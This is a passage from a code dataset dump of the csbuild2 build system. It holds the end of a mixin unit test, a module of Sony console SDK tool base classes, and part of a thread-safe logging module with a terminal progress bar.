tools\"\"\"\n\t\t# Call a function defined in both Derived1 and Derived2, but only call the Derived2 version\n\t\tself.mixin.Tool(self._derived2).DoMultiThing()\n\n\t\tself.assertChanged(\n\t\t\tdoMultiThingCalledInDerived2=1,\n\t\t)\n\n\t\t# Call a function defined in both Derived1 and Derived2, but only call the Derived1 version\n\t\tself.mixin.Tool(self._derived1).DoMultiThing()\n\n\t\tself.assertChanged(\n\t\t\tdoMultiThingCalledInDerived1=1,\n\t\t)\n\n\t\t# Call a function defined in both Derived1 and Derived2, and this time call both versions to verify\n\t\t# that multiple arguments to Tool works as expected\n\t\tself.mixin.Tool(self._derived1, self._derived2).DoMultiThing()\n\n\t\tself.assertChanged(\n\t\t\tdoMultiThingCalledInDerived1=2,\n\t\t\tdoMultiThingCalledInDerived2=2,\n\t\t)\n\n\t\t# Call a function defined in both Derived1 and Derived2, and this time call them both without going through Tool()\n\t\tself.mixin.DoMultiThing()\n\n\t\tself.assertChanged(\n\t\t\tdoMultiThingCalledInDerived1=3,\n\t\t\tdoMultiThingCalledInDerived2=3,\n\t\t)\n" }, { "alpha_fraction": 0.624221682548523, "alphanum_fraction": 0.6337443590164185, "avg_line_length": 35.00439453125, "blob_id": "c49d1abec61784a59d4e215e87ff878c50c44426", "content_id": "53c308f0c51ebefbcddda9c055c9831f6d4bbc2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16382, "license_type": "no_license", "max_line_length": 118, "num_lines": 455, "path": "/csbuild/tools/common/sony_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: sony_tool_base\n\t:synopsis: Base tools for all Sony tool implementations.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom abc import ABCMeta\n\nfrom csbuild import commands, log\n\nfrom .tool_traits import HasOptimizationLevel\n\nfrom ..._utils.decorators import MetaClass\nfrom ...toolchain import Tool\n\nOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\n@MetaClass(ABCMeta)\nclass Ps3ProjectType(object):\n\t\"\"\"\n\tReplacement of the base ProjectType enum values specifically for PS3 projects.\n\tThe original ProjectType values still work, but they will map directly to the\n\tPPU SNC output types.\n\n\tNote the overlapping types must be set manually since `ProjectType` cannot\n\tbe imported into this module.\n\t\"\"\"\n\tPpuSncApplication = 1 # Identical to `csbuild.ProjectType.Application`.\n\tPpuSncSharedLibrary = 2 # Identical to `csbuild.ProjectType.SharedLibrary`.\n\tPpuSncStaticLibrary = 3 # Identical to `csbuild.ProjectType.StaticLibrary`.\n\n\tPpuGccApplication = PpuSncApplication + 3\n\tPpuGccSharedLibrary = PpuSncSharedLibrary + 3\n\tPpuGccStaticLibrary = PpuSncStaticLibrary + 3\n\n\tSpuApplication = PpuGccApplication + 3\n\tSpuSharedLibrary = PpuGccSharedLibrary + 3\n\tSpuStaticLibrary = PpuGccStaticLibrary + 3\n\n\n@MetaClass(ABCMeta)\nclass Ps3ToolsetType(object):\n\t\"\"\"\n\tIdentifiers for the toolset that will be used for any given PS3 build.\n\t\"\"\"\n\tPpuSnc = \"ppu-snc\"\n\tPpuGcc = \"ppu-gcc\"\n\tSpu = \"spu\"\n\n\nclass Ps3BuildInfo(object):\n\t\"\"\"\n\tCollection of info representing the type of a project's output and the toolset it will use for the\n\tbuild based on the project type.\n\t\"\"\"\n\tdef __init__(self, projectType):\n\t\tself.outputType = {\n\t\t\tPs3ProjectType.PpuSncApplication: csbuild.ProjectType.Application,\n\t\t\tPs3ProjectType.PpuSncSharedLibrary: csbuild.ProjectType.SharedLibrary,\n\t\t\tPs3ProjectType.PpuSncStaticLibrary: csbuild.ProjectType.StaticLibrary,\n\n\t\t\tPs3ProjectType.PpuGccApplication: csbuild.ProjectType.Application,\n\t\t\tPs3ProjectType.PpuGccSharedLibrary: csbuild.ProjectType.SharedLibrary,\n\t\t\tPs3ProjectType.PpuGccStaticLibrary: csbuild.ProjectType.StaticLibrary,\n\n\t\t\tPs3ProjectType.SpuApplication: csbuild.ProjectType.Application,\n\t\t\tPs3ProjectType.SpuSharedLibrary: csbuild.ProjectType.SharedLibrary,\n\t\t\tPs3ProjectType.SpuStaticLibrary: csbuild.ProjectType.StaticLibrary,\n\t\t}.get(projectType, None)\n\n\t\tself.toolsetType = {\n\t\t\tPs3ProjectType.PpuSncApplication: Ps3ToolsetType.PpuSnc,\n\t\t\tPs3ProjectType.PpuSncSharedLibrary: Ps3ToolsetType.PpuSnc,\n\t\t\tPs3ProjectType.PpuSncStaticLibrary: Ps3ToolsetType.PpuSnc,\n\n\t\t\tPs3ProjectType.PpuGccApplication: Ps3ToolsetType.PpuGcc,\n\t\t\tPs3ProjectType.PpuGccSharedLibrary: Ps3ToolsetType.PpuGcc,\n\t\t\tPs3ProjectType.PpuGccStaticLibrary: Ps3ToolsetType.PpuGcc,\n\n\t\t\tPs3ProjectType.SpuApplication: Ps3ToolsetType.Spu,\n\t\t\tPs3ProjectType.SpuSharedLibrary: Ps3ToolsetType.Spu,\n\t\t\tPs3ProjectType.SpuStaticLibrary: Ps3ToolsetType.Spu,\n\t\t}.get(projectType, None)\n\n\t\tassert self.outputType is not None, \"Cannot determine PS3 build info, invalid project type: {}\".format(projectType)\n\t\tassert self.toolsetType is not None, \"Cannot determine PS3 build info, invalid project type: {}\".format(projectType)\n\n\n@MetaClass(ABCMeta)\nclass SonyBaseTool(Tool):\n\t\"\"\"\n\tParent class for all Sony tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\n\n@MetaClass(ABCMeta)\nclass Ps3BaseTool(SonyBaseTool):\n\t\"\"\"\n\tParent class for all PS3 tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tSonyBaseTool.__init__(self, projectSettings)\n\n\t\tself._ps3SdkPath = projectSettings.get(\"ps3SdkPath\", None)\n\t\tself._ps3SnPath = projectSettings.get(\"ps3SnPath\", None)\n\n\t\tself._ps3BuildInfo = None # type: Ps3BuildInfo\n\t\tself._ps3HostBinPath = None # type: str\n\t\tself._ps3SystemBinPath = None # type: str\n\t\tself._ps3SystemLibPaths = [] # type: list[str]\n\t\tself._ps3SystemIncludePaths = [] # type: list[str]\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef SetPs3SdkPath(path):\n\t\t\"\"\"\n\t\tSet the path to the PS3 SDK.\n\n\t\t:param path: Path to the PS3 SDK.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"ps3SdkPath\", os.path.abspath(path) if path else None)\n\n\t@staticmethod\n\tdef SetPs3SnPath(path):\n\t\t\"\"\"\n\t\tSet the path to the PS3 SN Systems directory.\n\n\t\t:param path: Path to the PS3 SN Systems installation directory.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"ps3SnPath\", os.path.abspath(path) if path else None)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t# If the SDK path wasn't set, attempt to find it from the environment.\n\t\tif not self._ps3SdkPath:\n\t\t\tself._ps3SdkPath = os.getenv(\"SCE_PS3_ROOT\", None)\n\n\t\tif not self._ps3SnPath:\n\t\t\tself._ps3SnPath = os.getenv(\"SN_PS3_PATH\", None)\n\n\t\tassert self._ps3SdkPath, \"No PS3 SDK path has been set\"\n\t\tassert os.access(self._ps3SdkPath, os.F_OK), \"PS3 SDK path does not exist: {}\".format(self._ps3SdkPath)\n\n\t\tassert self._ps3SnPath, \"No PS3 SN Systems path has been set\"\n\t\tassert os.access(self._ps3SnPath, os.F_OK), \"PS3 SN Systems path does not exist: {}\".format(self._ps3SnPath)\n\n\t\tself._ps3BuildInfo = Ps3BuildInfo(project.projectType)\n\n\t\tself._ps3SdkPath = os.path.abspath(self._ps3SdkPath)\n\t\tself._ps3SnPath = os.path.abspath(self._ps3SnPath)\n\n\t\thostRootPath = os.path.join(self._ps3SdkPath, \"host-win32\")\n\t\tself._ps3HostBinPath = os.path.join(hostRootPath, \"bin\")\n\n\t\tbuildToolRootPath = {\n\t\t\tPs3ToolsetType.PpuSnc: os.path.join(hostRootPath, \"sn\"),\n\t\t\tPs3ToolsetType.PpuGcc: os.path.join(hostRootPath, \"ppu\"),\n\t\t\tPs3ToolsetType.Spu: os.path.join(hostRootPath, \"spu\"),\n\t\t}.get(self._ps3BuildInfo.toolsetType, None)\n\n\t\tself._ps3SystemBinPath = os.path.join(buildToolRootPath, \"bin\")\n\t\tself._ps3SystemLibPaths = []\n\t\tself._ps3SystemIncludePaths = [\n\t\t\tos.path.join(self._ps3SdkPath, \"target\", \"common\", \"include\"),\n\t\t]\n\n\t\tif self._ps3BuildInfo.toolsetType == Ps3ToolsetType.Spu:\n\t\t\tself._ps3SystemLibPaths.extend([\n\t\t\t\tos.path.join(self._ps3SnPath, \"spu\", \"lib\", \"sn\"),\n\t\t\t\tos.path.join(self._ps3SdkPath, \"target\", \"spu\", \"lib\"),\n\t\t\t])\n\n\t\t\tself._ps3SystemIncludePaths.extend([\n\t\t\t\tos.path.join(self._ps3SnPath, \"spu\", \"include\", \"sn\"),\n\t\t\t\tos.path.join(self._ps3SdkPath, \"target\", \"spu\", \"include\"),\n\t\t\t])\n\n\t\telse:\n\t\t\tself._ps3SystemLibPaths.extend([\n\t\t\t\tos.path.join(self._ps3SnPath, \"ppu\", \"lib\", \"sn\"),\n\t\t\t\tos.path.join(self._ps3SdkPath, \"target\", \"ppu\", \"lib\"),\n\t\t\t])\n\n\t\t\tself._ps3SystemIncludePaths.extend([\n\t\t\t\tos.path.join(self._ps3SnPath, \"ppu\", \"include\", \"sn\"),\n\t\t\t\tos.path.join(self._ps3SdkPath, \"target\", \"ppu\", \"include\"),\n\t\t\t])\n\n\nclass Ps3SpuConverter(Ps3BaseTool, HasOptimizationLevel):\n\t\"\"\"\n\tTool that converts SPU binaries to PPU compiled objects for linking into PPU binaries.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"cell\" }\n\tinputFiles = { \".spu_elf\", \".spu_so\" }\n\toutputFiles = { \".a\" }\n\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tPs3BaseTool.__init__(self, projectSettings)\n\t\tHasOptimizationLevel.__init__(self, projectSettings)\n\n\n\t################################################################################\n\t### Internal methods\n\t################################################################################\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\tinputFileExtSplit = os.path.splitext(os.path.basename(inputFile.filename))\n\t\toutputFilePath = os.path.join(\n\t\t\tproject.outputDir,\n\t\t\t\"{}{}.a\".format(\n\t\t\t\tinputFileExtSplit[0],\n\t\t\t\tinputFileExtSplit[1].replace(\".\", \"_\")\n\t\t\t)\n\t\t)\n\t\treturn tuple({ outputFilePath })\n\n\tdef _getCommand(self, project, inputFile):\n\t\tcmdExe = self._getExeName()\n\t\tcmd = [cmdExe] \\\n\t\t\t+ self._getStripModeArgs() \\\n\t\t\t+ self._getInputArgs(inputFile) \\\n\t\t\t+ self._getOutputArgs(project, inputFile)\n\n\t\treturn cmd\n\n\tdef _getExeName(self):\n\t\treturn os.path.join(self._ps3HostBinPath, \"spu_elf-to-ppu_obj.exe\")\n\n\tdef _getStripModeArgs(self):\n\t\tstripMode = {\n\t\t\tOptimizationLevel.Disabled: \"none\",\n\t\t\tOptimizationLevel.Max: \"hard\",\n\t\t}.get(self._optLevel, \"normal\")\n\t\treturn [\"--strip-mode={}\".format(stripMode)]\n\n\tdef _getInputArgs(self, inputFile):\n\t\treturn [inputFile.filename]\n\n\tdef _getOutputArgs(self, project, inputFile):\n\t\treturn [self._getOutputFiles(project, inputFile)[0]]\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tPs3BaseTool.SetupForProject(self, project)\n\n\tdef Run(self, inputProject, inputFile):\n\t\t\"\"\"\n\t\tExecute a single build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: project being built\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFile: File to build\n\t\t:type inputFile: input_file.InputFile\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\n\t\t:raises BuildFailureException: Build process exited with an error.\n\t\t\"\"\"\n\t\tlog.Build(\n\t\t\t\"Converting SPU binary {} ({}-{}-{})...\",\n\t\t\tos.path.basename(inputFile.filename),\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName\n\t\t)\n\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFile))\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFile)\n\t\treturn self._getOutputFiles(inputProject, inputFile)\n\n\n@MetaClass(ABCMeta)\nclass Ps4BaseTool(SonyBaseTool):\n\t\"\"\"\n\tParent class for all PS4 tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tSonyBaseTool.__init__(self, projectSettings)\n\n\t\tself._ps4SdkPath = projectSettings.get(\"ps4SdkPath\", None)\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef SetPs4SdkPath(sdkPath):\n\t\t\"\"\"\n\t\tSet the path to the PS4 SDK.\n\n\t\t:param sdkPath: Path to the PS4 SDK.\n\t\t:type sdkPath: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"ps4SdkPath\", os.path.abspath(sdkPath) if sdkPath else None)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t# If the SDK path wasn't set, attempt to find it from the environment.\n\t\tif not self._ps4SdkPath:\n\t\t\tself._ps4SdkPath = os.getenv(\"SCE_ORBIS_SDK_DIR\", None)\n\n\t\tassert self._ps4SdkPath, \"No PS4 SDK path has been set\"\n\t\tassert os.access(self._ps4SdkPath, os.F_OK), \"PS4 SDK path does not exist: {}\".format(self._ps4SdkPath)\n\n\n@MetaClass(ABCMeta)\nclass Ps5BaseTool(SonyBaseTool):\n\t\"\"\"\n\tParent class for all PS5 tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tSonyBaseTool.__init__(self, projectSettings)\n\n\t\tself._ps5SdkPath = projectSettings.get(\"ps5SdkPath\", None)\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef SetPs5SdkPath(sdkPath):\n\t\t\"\"\"\n\t\tSet the path to the PS5 SDK.\n\n\t\t:param sdkPath: Path to the PS5 SDK.\n\t\t:type sdkPath: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"ps5SdkPath\", os.path.abspath(sdkPath) if sdkPath else None)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t# If the SDK path wasn't set, attempt to find it from the environment.\n\t\tif not self._ps5SdkPath:\n\t\t\tself._ps5SdkPath = os.getenv(\"SCE_PROSPERO_SDK_DIR\", None)\n\n\t\tassert self._ps5SdkPath, \"No PS5 SDK path has been set\"\n\t\tassert os.access(self._ps5SdkPath, os.F_OK), \"PS5 SDK path does not exist: {}\".format(self._ps5SdkPath)\n\n\n@MetaClass(ABCMeta)\nclass PsVitaBaseTool(SonyBaseTool):\n\t\"\"\"\n\tParent class for all PSVita tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tSonyBaseTool.__init__(self, projectSettings)\n\n\t\tself._psVitaSdkPath = projectSettings.get(\"psVitaSdkPath\", None)\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef SetPsVitaSdkPath(sdkPath):\n\t\t\"\"\"\n\t\tSet the path to the PSVita SDK.\n\n\t\t:param sdkPath: Path to the PSVita SDK.\n\t\t:type sdkPath: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"psVitaSdkPath\", os.path.abspath(sdkPath))\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t# If the SDK path wasn't set, attempt to find it from the environment.\n\t\tif not self._psVitaSdkPath:\n\t\t\tself._psVitaSdkPath = os.getenv(\"SCE_PSP2_SDK_DIR\", None)\n\n\t\tassert self._psVitaSdkPath, \"No PSVita SDK path has been set\"\n\t\tassert os.access(self._psVitaSdkPath, os.F_OK), \"PS4 PSVita path does not exist: {}\".format(self._psVitaSdkPath)\n" }, { "alpha_fraction": 0.6880289316177368, "alphanum_fraction": 0.6910653114318848, "avg_line_length": 26.061189651489258, "blob_id": "993250b39e5a45fef98ad20fad34f2d6e9cc2d29", "content_id": "fc97c67e4a532a22e82519ce01b8422fd7a73690", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15479, "license_type": "no_license", "max_line_length": 132, "num_lines": 572, "path": "/csbuild/log.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: log\n\t:synopsis: Thread-safe logging system\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport sys\nimport threading\nimport re\nimport time\nimport math\n\nfrom ._utils import terminfo, shared_globals, BytesType, StrType, queue, FormatTime, PlatformUnicode\nfrom ._utils.shared_globals import Verbosity\nfrom . import perf_timer\n\n_logQueue = queue.Queue()\n_stopEvent = object()\n_callbackQueue = None\n_logThread = threading.currentThread()\n_barPresent = False\n_lastPerc = 0.0\n_sep = \"<\"\n_fillChar = \"\\u2219\"\n\nColor = terminfo.TermColor\n\ndef _printProgressBar():\n\twith perf_timer.PerfTimer(\"printProgressBar\"):\n\t\tglobal _barPresent\n\t\tglobal _lastPerc\n\t\tglobal _sep\n\t\tglobal _fillChar\n\t\tcompleteBuilds = shared_globals.completedBuilds\n\t\ttotalBuilds = shared_globals.totalBuilds\n\t\tif shared_globals.columns != 0 and completeBuilds < totalBuilds:\n\t\t\t_barPresent = True\n\t\t\ttextSize = 42\n\n\t\t\tperc = 1 if totalBuilds == 0 else float(completeBuilds)/float(totalBuilds)\n\t\t\tif perc == 0:\n\t\t\t\t_sep = \"-\"\n\t\t\telif perc > _lastPerc:\n\t\t\t\t_sep = \">\"\n\t\t\telif perc < _lastPerc:\n\t\t\t\t_sep = \"<\"\n\t\t\t_lastPerc = perc\n\n\t\t\tincr = int(shared_globals.columns / 50)\n\t\t\tif totalBuilds <= incr:\n\t\t\t\tcount = totalBuilds * 4\n\t\t\telif totalBuilds <= incr * 2:\n\t\t\t\tcount = incr * 4 + (totalBuilds-incr) * 3\n\t\t\telif totalBuilds <= incr * 3:\n\t\t\t\tcount = incr * 4 + incr * 3 + (totalBuilds-incr*2) * 2\n\t\t\telse:\n\t\t\t\tcount = incr * 4 + incr * 3 + incr * 2 + (totalBuilds-incr*3)\n\n\t\t\tif count >= shared_globals.columns - textSize:\n\t\t\t\tcount = shared_globals.columns - textSize - 1\n\n\t\t\tnum = int( math.floor( perc * count ) )\n\n\t\t\tlside = num\n\t\t\trside = count - num - 1\n\n\t\t\ttotal = lside + rside + textSize\n\t\t\tmaxSpace = (shared_globals.columns-1) / 2\n\t\t\tspacePerSide = maxSpace - (total/2)\n\n\t\t\tif spacePerSide <= 1:\n\t\t\t\tlfill = \"\"\n\t\t\t\trfill = \"\"\n\t\t\telse:\n\t\t\t\tlfill = _fillChar * int(math.ceil(spacePerSide))\n\t\t\t\trfill = _fillChar * int(math.floor(spacePerSide))\n\t\t\t\tif lfill:\n\t\t\t\t\tlfill = lfill[:-1] + \" \"\n\t\t\t\tif rfill:\n\t\t\t\t\trfill = \" \" + rfill[1:]\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tterminfo.TermInfo.SetColor(Color.WHITE)\n\n\t\t\tsys.stdout.write(\" [\")\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.GREEN)\n\n\t\t\tsys.stdout.write(\"{: 4}\".format(completeBuilds))\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.ResetColor()\n\n\t\t\tsys.stdout.write(\" tasks done \")\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.WHITE)\n\n\t\t\tsys.stdout.write(\"] \")\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.DGREY)\n\t\t\ttry:\n\t\t\t\tsys.stdout.write(lfill)\n\t\t\texcept UnicodeEncodeError:\n\t\t\t\t_fillChar = \":\"\n\t\t\t\t_printProgressBar()\n\t\t\t\treturn\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.WHITE)\n\n\t\t\tsys.stdout.write(\"[\")\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.DGREEN)\n\n\t\t\tsys.stdout.write(\"=\" * lside)\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.ResetColor()\n\n\t\t\tif perc == 0:\n\t\t\t\tif shared_globals.colorSupported:\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\tterminfo.TermInfo.SetColor(Color.DYELLOW)\n\n\t\t\tsys.stdout.write(_sep)\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.DYELLOW)\n\n\t\t\tsys.stdout.write(\"-\" * rside)\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.WHITE)\n\n\t\t\tsys.stdout.write(\"]\")\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.DGREY)\n\t\t\tsys.stdout.write(rfill)\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.WHITE)\n\n\t\t\tsys.stdout.write(\" [\")\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.YELLOW)\n\n\t\t\tsys.stdout.write(\"{: 4}\".format(totalBuilds))\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.ResetColor()\n\n\t\t\tsys.stdout.write(\" discovered \")\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.WHITE)\n\t\t\tsys.stdout.write(\"]\")\n\t\t\tsys.stdout.flush()\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tterminfo.TermInfo.ResetColor()\n\t\telse:\n\t\t\t_barPresent = False\n\ndef _clearProgressBar():\n\twith perf_timer.PerfTimer(\"clearProgressBar\"):\n\t\tglobal _barPresent\n\t\tif _barPresent:\n\t\t\tsys.stdout.write(shared_globals.clearBar)\n\t\t\t_barPresent = False\n\ndef UpdateProgressBar():\n\t\"\"\"Update the progress bar, foo\"\"\"\n\twith perf_timer.PerfTimer(\"updateProgressBar\"):\n\t\tif threading.current_thread() != _logThread:\n\t\t\t_callbackQueue.Put(UpdateProgressBar)\n\t\telse:\n\t\t\t_clearProgressBar()\n\t\t\t_printProgressBar()\n\n_twoTagMatch = re.compile(R\"(<&\\w*>)(.*?)(</&>|$)\")\n_tagNameMatch = re.compile(R\"<&(\\w*)>\")\n\ndef _writeLog(color, level, msg, destination=sys.stdout):\n\twith perf_timer.PerfTimer(\"Logging\"):\n\t\t_clearProgressBar()\n\n\t\tif shared_globals.colorSupported and color is not None:\n\t\t\tterminfo.TermInfo.SetColor(color)\n\t\t\tif level is not None:\n\t\t\t\tdestination.write(\"{}: \".format(level))\n\t\t\tdestination.flush()\n\t\t\tterminfo.TermInfo.ResetColor()\n\n\t\t\tif \"</\" in msg:\n\t\t\t\twith perf_timer.PerfTimer(\"Regex splitting\"):\n\t\t\t\t\tsplit = _twoTagMatch.split(msg)\n\t\t\t\t\tfor piece in split:\n\t\t\t\t\t\tmatch = _tagNameMatch.match(piece)\n\t\t\t\t\t\tif match:\n\t\t\t\t\t\t\tcolor = getattr(Color, match.group(1))\n\t\t\t\t\t\t\tterminfo.TermInfo.SetColor(color)\n\t\t\t\t\t\telif piece == \"</&>\":\n\t\t\t\t\t\t\tterminfo.TermInfo.ResetColor()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tdestination.write(piece)\n\t\t\t\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\t\t\t\tdestination.write(piece.encode(\"ascii\", \"replace\").decode(\"ascii\", \"replace\"))\n\t\t\t\t\t\t\tdestination.flush()\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tdestination.write(msg)\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tdestination.write(msg.encode(\"ascii\", \"replace\").decode(\"ascii\", \"replace\"))\n\n\t\t\tdestination.write(\"\\n\")\n\n\t\t\tterminfo.TermInfo.ResetColor()\n\t\telse:\n\t\t\tif level is not None:\n\t\t\t\tdestination.write(\"{}: \".format(level))\n\n\t\t\tif \"</\" in msg:\n\t\t\t\twith perf_timer.PerfTimer(\"Regex splitting\"):\n\t\t\t\t\tsplit = _twoTagMatch.split(msg)\n\t\t\t\t\tfor piece in split:\n\t\t\t\t\t\tmatch = _tagNameMatch.match(piece)\n\t\t\t\t\t\tif match or piece == \"</&>\":\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tdestination.write(piece)\n\t\t\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\t\t\tdestination.write(piece.encode(\"ascii\", \"replace\").decode(\"ascii\", 